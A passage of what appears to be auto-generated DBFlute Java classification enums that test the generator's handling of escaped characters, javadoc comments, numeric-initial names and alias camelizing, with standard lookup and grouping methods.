        List<QuxCls> clsList = new ArrayList<QuxCls>(codeList.size());
        for (String code : codeList) { clsList.add(of(code).get()); }
        return clsList;
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
     */
    public static List<QuxCls> groupOf(String groupName) {
        // no groups are defined, so always an empty (pre-sized) list
        return new ArrayList<QuxCls>(4);
    }
    @Override public String toString() { return code(); }
}
/**
 * delimiter; & endBrace} & path\foo\bar
 */
public enum EscapedDfpropCls implements CDef {
    /** First: delimiter & rear escape char */
    First(";@\\", "First", emptyStrings())
    ,
    /** Second: escape char & endBrace & delimiter */
    Second("\\};", "Second", emptyStrings())
    ,
    /** Third: startBrace & equal & endBrace */
    Third("{=}", "Third", emptyStrings())
    ;
    // case-insensitive lookup tables: lower-cased code (and sister codes) / lower-cased name -> element
    // NOTE: codes here deliberately contain dfprop meta characters (';', '}', '\\') to exercise escaping
    private static final Map<String, EscapedDfpropCls> _codeClsMap = new HashMap<String, EscapedDfpropCls>();
    private static final Map<String, EscapedDfpropCls> _nameClsMap = new HashMap<String, EscapedDfpropCls>();
    static {
        // register every element eagerly so of()/byName() resolve without scanning values()
        for (EscapedDfpropCls value : values()) {
            _codeClsMap.put(value.code().toLowerCase(), value);
            for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
            _nameClsMap.put(value.name().toLowerCase(), value);
        }
    }
    // immutable per-element state: plain code, display alias, alternative (sister) codes
    private String _code; private String _alias; private Set<String> _sisterSet;
    private EscapedDfpropCls(String code, String alias, String[] sisters)
    { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
    public String code() { return _code; } public String alias() { return _alias; }
    public Set<String> sisterSet() { return _sisterSet; }
    public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
    public ClassificationMeta meta() { return CDef.DefMeta.EscapedDfpropCls; }
    public boolean inGroup(String groupName) {
        // this classification defines no groups
        return false;
    }
    /**
     * Get the classification of the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
     * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<EscapedDfpropCls> of(Object code) {
        if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
        if (code instanceof EscapedDfpropCls) { return OptionalThing.of((EscapedDfpropCls)code); }
        if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
        return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification code: " + code);
        });
    }
    /**
     * Find the classification by the name. (CaseInsensitive)
     * @param name The string of name, which is case-insensitive. (NotNull)
     * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<EscapedDfpropCls> byName(String name) {
        if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
        return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification name: " + name);
        });
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
     * Get the classification by the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
     */
    public static EscapedDfpropCls codeOf(Object code) {
        if (code == null) { return null; }
        if (code instanceof EscapedDfpropCls) { return (EscapedDfpropCls)code; }
        return _codeClsMap.get(code.toString().toLowerCase());
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
     * Get the classification by the name (also called 'value' in ENUM world).
     * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
     */
    public static EscapedDfpropCls nameOf(String name) {
        if (name == null) { return null; }
        // valueOf throws on unknown names; this legacy accessor maps that to null
        try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
    }
    /**
     * Get the list of all classification elements. (returns new copied list)
     * @return The snapshot list of all classification elements. (NotNull)
     */
    public static List<EscapedDfpropCls> listAll() {
        return new ArrayList<EscapedDfpropCls>(Arrays.asList(values()));
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
     */
    public static List<EscapedDfpropCls> listByGroup(String groupName) {
        if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
        // no groups are defined for this classification, so any name is unknown
        throw new ClassificationNotFoundException("Unknown classification group: EscapedDfpropCls." + groupName);
    }
    /**
     * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
     * @param codeList The list of plain code, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
     */
    public static List<EscapedDfpropCls> listOf(Collection<String> codeList) {
        if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
        List<EscapedDfpropCls> clsList = new ArrayList<EscapedDfpropCls>(codeList.size());
        for (String code : codeList) { clsList.add(of(code).get()); }
        return clsList;
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
     */
    public static List<EscapedDfpropCls> groupOf(String groupName) {
        // no groups are defined, so always an empty (pre-sized) list
        return new ArrayList<EscapedDfpropCls>(4);
    }
    @Override public String toString() { return code(); }
}
/**
 * /*IF pmb.yourTop*/><&
 */
public enum EscapedJavaDocCls implements CDef {
    /** First: /*IF pmb.yourFooComment*/><& */
    First("FOO", "First", emptyStrings())
    ,
    /** Second: /*IF pmb.yourBarComment*/><& */
    Second("BAR", "Second", emptyStrings())
    ;
    // NOTE(review): the javadocs above embed "*/" sequences (IF comments); presumably the generator
    // escapes these when emitting real sources -- verify this chunk compiles as written
    // case-insensitive lookup tables: lower-cased code (and sister codes) / lower-cased name -> element
    private static final Map<String, EscapedJavaDocCls> _codeClsMap = new HashMap<String, EscapedJavaDocCls>();
    private static final Map<String, EscapedJavaDocCls> _nameClsMap = new HashMap<String, EscapedJavaDocCls>();
    static {
        // register every element eagerly so of()/byName() resolve without scanning values()
        for (EscapedJavaDocCls value : values()) {
            _codeClsMap.put(value.code().toLowerCase(), value);
            for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
            _nameClsMap.put(value.name().toLowerCase(), value);
        }
    }
    // immutable per-element state: plain code, display alias, alternative (sister) codes
    private String _code; private String _alias; private Set<String> _sisterSet;
    private EscapedJavaDocCls(String code, String alias, String[] sisters)
    { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
    public String code() { return _code; } public String alias() { return _alias; }
    public Set<String> sisterSet() { return _sisterSet; }
    public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
    public ClassificationMeta meta() { return CDef.DefMeta.EscapedJavaDocCls; }
    /**
     * Is the classification in the group? <br>
     * /*IF pmb.yourGroup*/><& <br>
     * The group elements:[First, Second]
     * @return The determination, true or false.
     */
    public boolean isLineGroup() {
        return First.equals(this) || Second.equals(this);
    }
    public boolean inGroup(String groupName) {
        // only "lineGroup" is defined; the match is case-sensitive here
        if ("lineGroup".equals(groupName)) { return isLineGroup(); }
        return false;
    }
    /**
     * Get the classification of the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
     * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<EscapedJavaDocCls> of(Object code) {
        if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
        if (code instanceof EscapedJavaDocCls) { return OptionalThing.of((EscapedJavaDocCls)code); }
        if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
        return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification code: " + code);
        });
    }
    /**
     * Find the classification by the name. (CaseInsensitive)
     * @param name The string of name, which is case-insensitive. (NotNull)
     * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<EscapedJavaDocCls> byName(String name) {
        if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
        return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification name: " + name);
        });
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
     * Get the classification by the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
     */
    public static EscapedJavaDocCls codeOf(Object code) {
        if (code == null) { return null; }
        if (code instanceof EscapedJavaDocCls) { return (EscapedJavaDocCls)code; }
        return _codeClsMap.get(code.toString().toLowerCase());
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
     * Get the classification by the name (also called 'value' in ENUM world).
     * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
     */
    public static EscapedJavaDocCls nameOf(String name) {
        if (name == null) { return null; }
        // valueOf throws on unknown names; this legacy accessor maps that to null
        try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
    }
    /**
     * Get the list of all classification elements. (returns new copied list)
     * @return The snapshot list of all classification elements. (NotNull)
     */
    public static List<EscapedJavaDocCls> listAll() {
        return new ArrayList<EscapedJavaDocCls>(Arrays.asList(values()));
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
     */
    public static List<EscapedJavaDocCls> listByGroup(String groupName) {
        if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
        if ("lineGroup".equalsIgnoreCase(groupName)) { return listOfLineGroup(); }
        throw new ClassificationNotFoundException("Unknown classification group: EscapedJavaDocCls." + groupName);
    }
    /**
     * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
     * @param codeList The list of plain code, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
     */
    public static List<EscapedJavaDocCls> listOf(Collection<String> codeList) {
        if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
        List<EscapedJavaDocCls> clsList = new ArrayList<EscapedJavaDocCls>(codeList.size());
        for (String code : codeList) { clsList.add(of(code).get()); }
        return clsList;
    }
    /**
     * Get the list of group classification elements. (returns new copied list) <br>
     * /*IF pmb.yourGroup*/><& <br>
     * The group elements:[First, Second]
     * @return The snapshot list of classification elements in the group. (NotNull)
     */
    public static List<EscapedJavaDocCls> listOfLineGroup() {
        return new ArrayList<EscapedJavaDocCls>(Arrays.asList(First, Second));
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
     */
    public static List<EscapedJavaDocCls> groupOf(String groupName) {
        if ("lineGroup".equals(groupName)) { return listOfLineGroup(); }
        return new ArrayList<EscapedJavaDocCls>(4);
    }
    @Override public String toString() { return code(); }
}
/**
 * 6
 */
public enum EscapedNumberInitialCls implements CDef {
    /** 1Foo */
    N1Foo("1FO", "1Foo", emptyStrings())
    ,
    /** 3Bar */
    N3Bar("3BA", "3Bar", emptyStrings())
    ,
    /** 7Qux */
    N7Qux("7QU", "7Qux", emptyStrings())
    ,
    /** Corge9 */
    Corge9("CO9", "Corge9", emptyStrings())
    ;
    // constant names carry an 'N' prefix where the alias starts with a digit (Java identifiers cannot)
    // case-insensitive lookup tables: lower-cased code (and sister codes) / lower-cased name -> element
    private static final Map<String, EscapedNumberInitialCls> _codeClsMap = new HashMap<String, EscapedNumberInitialCls>();
    private static final Map<String, EscapedNumberInitialCls> _nameClsMap = new HashMap<String, EscapedNumberInitialCls>();
    static {
        // register every element eagerly so of()/byName() resolve without scanning values()
        for (EscapedNumberInitialCls value : values()) {
            _codeClsMap.put(value.code().toLowerCase(), value);
            for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
            _nameClsMap.put(value.name().toLowerCase(), value);
        }
    }
    // immutable per-element state: plain code, display alias, alternative (sister) codes
    private String _code; private String _alias; private Set<String> _sisterSet;
    private EscapedNumberInitialCls(String code, String alias, String[] sisters)
    { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
    public String code() { return _code; } public String alias() { return _alias; }
    public Set<String> sisterSet() { return _sisterSet; }
    public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
    public ClassificationMeta meta() { return CDef.DefMeta.EscapedNumberInitialCls; }
    public boolean inGroup(String groupName) {
        // this classification defines no groups
        return false;
    }
    /**
     * Get the classification of the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
     * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<EscapedNumberInitialCls> of(Object code) {
        if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
        if (code instanceof EscapedNumberInitialCls) { return OptionalThing.of((EscapedNumberInitialCls)code); }
        if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
        return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification code: " + code);
        });
    }
    /**
     * Find the classification by the name. (CaseInsensitive)
     * @param name The string of name, which is case-insensitive. (NotNull)
     * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<EscapedNumberInitialCls> byName(String name) {
        if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
        return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification name: " + name);
        });
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
     * Get the classification by the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
     */
    public static EscapedNumberInitialCls codeOf(Object code) {
        if (code == null) { return null; }
        if (code instanceof EscapedNumberInitialCls) { return (EscapedNumberInitialCls)code; }
        return _codeClsMap.get(code.toString().toLowerCase());
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
     * Get the classification by the name (also called 'value' in ENUM world).
     * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
     */
    public static EscapedNumberInitialCls nameOf(String name) {
        if (name == null) { return null; }
        // valueOf throws on unknown names; this legacy accessor maps that to null
        try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
    }
    /**
     * Get the list of all classification elements. (returns new copied list)
     * @return The snapshot list of all classification elements. (NotNull)
     */
    public static List<EscapedNumberInitialCls> listAll() {
        return new ArrayList<EscapedNumberInitialCls>(Arrays.asList(values()));
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
     */
    public static List<EscapedNumberInitialCls> listByGroup(String groupName) {
        if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
        // no groups are defined for this classification, so any name is unknown
        throw new ClassificationNotFoundException("Unknown classification group: EscapedNumberInitialCls." + groupName);
    }
    /**
     * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
     * @param codeList The list of plain code, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
     */
    public static List<EscapedNumberInitialCls> listOf(Collection<String> codeList) {
        if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
        List<EscapedNumberInitialCls> clsList = new ArrayList<EscapedNumberInitialCls>(codeList.size());
        for (String code : codeList) { clsList.add(of(code).get()); }
        return clsList;
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
     */
    public static List<EscapedNumberInitialCls> groupOf(String groupName) {
        // no groups are defined, so always an empty (pre-sized) list
        return new ArrayList<EscapedNumberInitialCls>(4);
    }
    @Override public String toString() { return code(); }
}
/**
 * top first line top second line top third line
 */
public enum LineSepCommentCls implements CDef {
    /** First: foo first line foo second line */
    First("FOO", "First", emptyStrings())
    ,
    /** Second: bar first line bar second line */
    Second("BAR", "Second", emptyStrings())
    ;
    // case-insensitive lookup tables: lower-cased code (and sister codes) / lower-cased name -> element
    private static final Map<String, LineSepCommentCls> _codeClsMap = new HashMap<String, LineSepCommentCls>();
    private static final Map<String, LineSepCommentCls> _nameClsMap = new HashMap<String, LineSepCommentCls>();
    static {
        // register every element eagerly so of()/byName() resolve without scanning values()
        for (LineSepCommentCls value : values()) {
            _codeClsMap.put(value.code().toLowerCase(), value);
            for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
            _nameClsMap.put(value.name().toLowerCase(), value);
        }
    }
    // immutable per-element state: plain code, display alias, alternative (sister) codes
    private String _code; private String _alias; private Set<String> _sisterSet;
    private LineSepCommentCls(String code, String alias, String[] sisters)
    { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
    public String code() { return _code; } public String alias() { return _alias; }
    public Set<String> sisterSet() { return _sisterSet; }
    public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
    public ClassificationMeta meta() { return CDef.DefMeta.LineSepCommentCls; }
/**
* Is the classification in the group? <br>
* group first line group second line <br>
* The group elements:[First, Second]
* @return The determination, true or false.
*/
public boolean isLineGroup() {
return First.equals(this) || Second.equals(this);
}
public boolean inGroup(String groupName) {
if ("lineGroup".equals(groupName)) { return isLineGroup(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<LineSepCommentCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof LineSepCommentCls) { return OptionalThing.of((LineSepCommentCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<LineSepCommentCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static LineSepCommentCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof LineSepCommentCls) { return (LineSepCommentCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static LineSepCommentCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<LineSepCommentCls> listAll() {
return new ArrayList<LineSepCommentCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<LineSepCommentCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("lineGroup".equalsIgnoreCase(groupName)) { return listOfLineGroup(); }
throw new ClassificationNotFoundException("Unknown classification group: LineSepCommentCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<LineSepCommentCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<LineSepCommentCls> clsList = new ArrayList<LineSepCommentCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* group first line group second line <br>
* The group elements:[First, Second]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<LineSepCommentCls> listOfLineGroup() {
return new ArrayList<LineSepCommentCls>(Arrays.asList(First, Second));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<LineSepCommentCls> groupOf(String groupName) {
if ("lineGroup".equals(groupName)) { return listOfLineGroup(); }
return new ArrayList<LineSepCommentCls>(4);
}
@Override public String toString() { return code(); }
}
/**
 * no camelizing classification
 */
public enum NamingDefaultCamelizingType implements CDef {
// NOTE(review): appears to be auto-generated DBFlute classification (CDef) code -- confirm before hand-editing; regeneration would overwrite manual changes.
// Element names here exercise the generator's default camelizing of aliases (including non-ASCII characters).
/** Bonvo */
Bonvo("BONVO", "Bonvo", emptyStrings())
,
/** dstore */
Dstore("DSTORE", "dstore", emptyStrings())
,
/** LAND陸oneman */
LAND陸oneman("LAND", "LAND陸oneman", emptyStrings())
,
/** PI AR-I */
PiArI("PIARI", "PI AR-I", emptyStrings())
,
/** SEA海MYSTIC */
Sea海mystic("SEA", "SEA海MYSTIC", emptyStrings())
;
// Lookup tables built once at class initialization: lowercased code (and sister codes) -> element, and lowercased enum name -> element, enabling case-insensitive search.
private static final Map<String, NamingDefaultCamelizingType> _codeClsMap = new HashMap<String, NamingDefaultCamelizingType>();
private static final Map<String, NamingDefaultCamelizingType> _nameClsMap = new HashMap<String, NamingDefaultCamelizingType>();
static {
for (NamingDefaultCamelizingType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
// Immutable per-element state; the sister set is wrapped unmodifiable at construction.
private String _code; private String _alias; private Set<String> _sisterSet;
private NamingDefaultCamelizingType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.NamingDefaultCamelizingType; }
// No groups are defined for this classification.
public boolean inGroup(String groupName) {
return false;
}
/**
 * Get the classification of the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
 * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<NamingDefaultCamelizingType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof NamingDefaultCamelizingType) { return OptionalThing.of((NamingDefaultCamelizingType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
 * Find the classification by the name. (CaseInsensitive)
 * @param name The string of name, which is case-insensitive. (NotNull)
 * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
 */
public static OptionalThing<NamingDefaultCamelizingType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
 * Get the classification by the code. (CaseInsensitive)
 * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
 */
public static NamingDefaultCamelizingType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof NamingDefaultCamelizingType) { return (NamingDefaultCamelizingType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
 * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
 * Get the classification by the name (also called 'value' in ENUM world).
 * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
 * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
 */
public static NamingDefaultCamelizingType nameOf(String name) {
if (name == null) { return null; }
// valueOf() throws IllegalArgumentException on unknown names; swallowed here to keep the legacy null-returning contract.
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
 * Get the list of all classification elements. (returns new copied list)
 * @return The snapshot list of all classification elements. (NotNull)
 */
public static List<NamingDefaultCamelizingType> listAll() {
return new ArrayList<NamingDefaultCamelizingType>(Arrays.asList(values()));
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
 */
public static List<NamingDefaultCamelizingType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: NamingDefaultCamelizingType." + groupName);
}
/**
 * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
 * @param codeList The list of plain code, which is case-insensitive. (NotNull)
 * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
 */
public static List<NamingDefaultCamelizingType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<NamingDefaultCamelizingType> clsList = new ArrayList<NamingDefaultCamelizingType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
 * Get the list of classification elements in the specified group. (returns new copied list) <br>
 * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
 */
public static List<NamingDefaultCamelizingType> groupOf(String groupName) {
// No groups are defined, so any group name yields an empty list.
return new ArrayList<NamingDefaultCamelizingType>(4);
}
@Override public String toString() { return code(); }
}
/**
 * no camelizing classification
 */
public enum NamingNoCamelizingType implements CDef {
// NOTE(review): appears to be auto-generated DBFlute classification (CDef) code -- confirm before hand-editing; regeneration would overwrite manual changes.
// Element names here preserve the aliases without camelizing (note lowercase "dstore" and underscore "PI_ARI").
/** Bonvo */
Bonvo("BONVO", "Bonvo", emptyStrings())
,
/** dstore */
dstore("DSTORE", "dstore", emptyStrings())
,
/** LAND陸oneman */
LAND陸oneman("LAND", "LAND陸oneman", emptyStrings())
,
/** PI AR-I */
PI_ARI("PIARI", "PI AR-I", emptyStrings())
,
/** SEA海MYSTIC */
SEA海MYSTIC("SEA", "SEA海MYSTIC", emptyStrings())
;
// Lookup tables built once at class initialization: lowercased code (and sister codes) -> element, and lowercased enum name -> element, enabling case-insensitive search.
private static final Map<String, NamingNoCamelizingType> _codeClsMap = new HashMap<String, NamingNoCamelizingType>();
private static final Map<String, NamingNoCamelizingType> _nameClsMap = new HashMap<String, NamingNoCamelizingType>();
static {
for (NamingNoCamelizingType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
